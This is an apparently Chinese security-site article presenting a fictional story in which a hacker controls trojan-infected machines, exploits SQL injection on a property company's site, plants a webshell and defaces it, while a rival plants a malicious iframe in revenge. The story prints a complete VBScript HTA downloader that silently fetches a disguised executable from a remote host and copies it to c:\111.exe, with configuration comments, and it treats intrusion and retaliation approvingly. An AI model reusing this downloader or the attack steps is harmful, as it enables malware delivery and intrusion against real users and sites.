为了顺应当前形势和更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

黑客无间道

2010-3-4 14:52| 投稿: security

摘要:     本文纯属虚构,如有雷同,请让雷先生致电作者    第一幕:遭遇小白    我叫小黑,黑白的黑。&nbs...
    本文纯属虚构,如有雷同,请让雷先生致电作者    第一幕:遭遇小白    我叫小黑,黑白的黑。    小黑是我的网名,因为我是网络中的一名侠客,或者通俗点儿说是一名黑客。我很喜欢行侠仗义的感觉,我崇拜着那种武侠小说里描绘的“侠之大者”和黑社会的古惑仔义气;向往着那种刀光剑影,大碗喝酒、大口吃肉的豪情;不过我只能够在网络的江湖中掀起血雨腥风。当然主要也因为现实生活中的我……    唉,不提了,总之,我是网络中的大侠就可以。    窗外的风又开始吹了,挟裹着白色的雪花打在窗户上,冷风巧妙的绕过那层单薄的玻璃,让屋内寒气袭人。在这个仅有8平米的小房子里,我的手冻得瑟瑟发抖,看着电脑屏幕中PCShare木马中的庞大肉鸡群,我开始漫无目的翻检这些肉鸡的目录。    突然,一台肉鸡吸引了我的注意,屏幕中这台电脑的主人似乎在更新一个网站,难道这是一个网站管理员的电脑?我一下子提起了精神,先提取一下键盘记录,把他的密码搞回来再说。可不知道为什么点了查看“键盘记录”按钮N次,最终什么都提取回来,这是怎么回事儿?查看一下肉鸡的进程!    -_-||我彻底无语了,中国排名前十名的木马和病毒几乎都能够在这台肉鸡中找到,由于病毒多,相互争夺权限,也导致了我无法正常提取回这台肉鸡的键盘记录。眼看着这个肉鸡的上的小白就关闭了自己的网站后台界面,我那叫一个着急呀。    难道我真的寂寞到了极点?不知道为什么我竟然调出了木马的信使功能,给这个电脑小白发了一段话:“你电脑中的病毒真多呀!”。这段话的突然出现让似乎让这个小白有些莫名其妙,在木马的屏幕监控上,小白似乎停止了所有的操作。    “你是谁呀?”    晕,这个小白竟然用信使回复我了。我还以为她会吓得屁滚尿流的关闭电脑。    “我是黑客,我入侵了你的电脑,你害怕不害怕呀?”    “哇!黑客,好神奇呀!你能够进我电脑一定很厉害!”    “-_-||是吗?你的电脑里有好多病毒!”    “我说怎么总感觉它最近反应慢,要不黑客,你帮我杀杀毒吧!”    “o_o||”    “你刚在在更新网站?”    “对呀,我是XX房地产公司的,我刚才在更新我们新开盘的房屋价格。”    此时我在顿然醒悟,这个小白竟然是有地产界“大炮”称号的奸商公司的员工。进入他们公司的网站,里面贴满了“大炮”有经典语录的文章:“中国人太有钱,房子太便宜”、“高档房本来就是穷人买不起的”、“没买房的人都亏了”……    黑了他!    第二幕:黑客无敌    我大学毕业一年多了,在没有迈入社会之前,总以为只要学了跟计算机专业沾边的,就凭我这IQ,将来不是比尔盖茨就是乔布斯,最差也混个马云呀。不过现在看来,我只有给老板们当牛做马的份儿。每个月领着微薄的工资,在城中村简陋的板房中孤单生活。    其实我也有一段凄美的爱情故事,我和女友圆圆险些就步入洞房了,但那个冷若冰霜的准丈母娘冷酷的问我:“娶我女儿的洞房在什么地方?”这时我才发现,无论现实还是童话故事,都是一样残酷的,如果王子没有城堡,公主宁肯嫁给史瑞克,至少他在沼泽地里有木屋。彻底沦为剩男中的“剩斗士”之后,上网成为了我唯一的调剂,我多么希望我菜地里的那栋豪宅能够变成现实呀。    “没买房的人都亏了”,是呀,我连老婆都因为你们这帮奸商亏给别人了!黑掉他!这是我脑海里唯一想到的。传统文化教育我们,谦虚使人进步,骄傲使人落后。在今天这个竞争激烈,张扬自我的年代,谦虚往往失去许多机会,我小黑这个时候就不谦虚了!    说干就干,我迅速调开这个网站的新闻页面,发现网站程序是用动态语言PHP写的,网址都是类似“http://www.nongsita.com/fangzi.php?username=888” 这样的动态页面,只要不是HTML之类的静态网页,就总能够找到漏洞。我于是开始在每个网址后面加入了一个“,”号,仅耗时5分钟其中一个页面就立刻爆出了MYSQL的错误提示页面。    注入点顺利的找到了,此时可以祭出辅助工具帮助进行渗透了。我调出了PHP注入中小有名气的“翔哥PHP注入工具”,这是一款能够帮助黑客进行SQL注入的最好的工具之一。    黑客小知识:所谓的SQL注入测试就是通过利用目标网站的某个页面缺少对用户传递参数控制或者控制的不够好的情况下出现的漏洞,从而达到获取、修改、删除数据,甚至控制数据库服务器、Web服务器的目的的测试方法。“翔哥PHP注入工具”能够通过一系列非常简单的操作,达到最大化的攻击测试效果。它从检测注入开始到最后控制目标系统都给出了测试步骤。    在PHP注入工具的URL一项中输入查找出的注入点网址,然后点击Check就开始进行注入漏洞的检验了。很快这家房地产公司网站的数据库名称等信息就全部被猜了出来,然后使用MySQL的提权工具进行提权,添加管理员账号,上传Webshell木马。将他们老板的照片全部PS……    第三幕:连环套,黑吃黑    CBD中心一座摩天高楼中,“大炮”因为新闻媒体报道自己公司网站被黑很不爽。他拿着一支雪茄烟,声色俱厉的训斥着下属。    “狂牛,找到这个跟我作对的家伙!”    屋子里的一个略带微胖的男人,没有说话,轻轻的点了点头,转身离去。    狂牛回到自己的办公室,开始着手分析入侵者,仅凭着直觉,他很快就找到了小黑留在网站中的后门WebShell。    狂牛冷冷一笑,他的计划很简单,在小黑的WebShell上挂一个木马,只要小黑再次向登陆他留在网站中的这个后门,就有可能会中狂牛的木马。狂牛想做的不是清除掉小黑的程序,而是直接清除掉小黑。狂牛在小黑的留下的后门网页中插入了一段iframe框架代码,这段代码指向了一个特殊的.hta的网页,随后在写字板里写下了一段代码:    <script language=vbs>    window.moveTo 4000,4000    window.resizeTo 0,0 '使hta不可见    set objshell= Createobject("WScript.Shell")'hta是可以直接调用WScript.Shell的,不过不能调用 wscript.Createobject("WScript.Shell")    downpath=objshell.ExpandEnvironmentStrings("%USERPROFILE%")&"\Local Settings" '根据环境变量得到下载的路径    set xml=document.createElement_x("xml")'建方xml元素调用ie的默认行为    xml.addBehavior("#default#DownLoad")    xml.async=0    xml.load("http://192.168.0.10/xx.htm")'请把exe改名放到空间上,用ftp软件上传的话,可能不行,直接放比较好    ShowAllFile(downpath)    Sub ShowAllFile(Path)    FindFileName="xx[1].htm" '这个也是你需要改的,如果上边是xx.htm,这里就是xx[1].htm    Set FSO = CreateObject("Scripting.FileSystemObject")    Set f = FSO.GetFolder(Path)    Set fc = f.SubFolders    For Each f1 in fc    If FSO.FileExists(path&"\"&f1.name&"\"&FindFileName) Then    FSO.CopyFile path&"\"&f1.name&"\"&FindFileName, "c:\111.exe" '保存到c:\111.exe,可根据需要改动    'document.write "[+]Download Success !"    End If    ShowAllFile path&"\"&f1.name    Next    Set FSO = Nothing    End Sub    window.close    </script>    代码写完后,保存为.hta文件,带着木马被一并上传到了被黑的网站中。狂牛现在所做的仅是等待……    第四幕:三天后    凌晨2点,小黑刚刚打开电脑,连接上网络,突然屏幕一黑,硬盘开始疯狂的转动,小黑此时意识到大事不妙,慌忙的去拔网线,然而一切都晚了,硬盘中的数据已经全部被销毁,连主板的BIOS也被破坏,狂牛将小黑电脑BIOS启动图片修改成了一个大大的“拆”字……

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部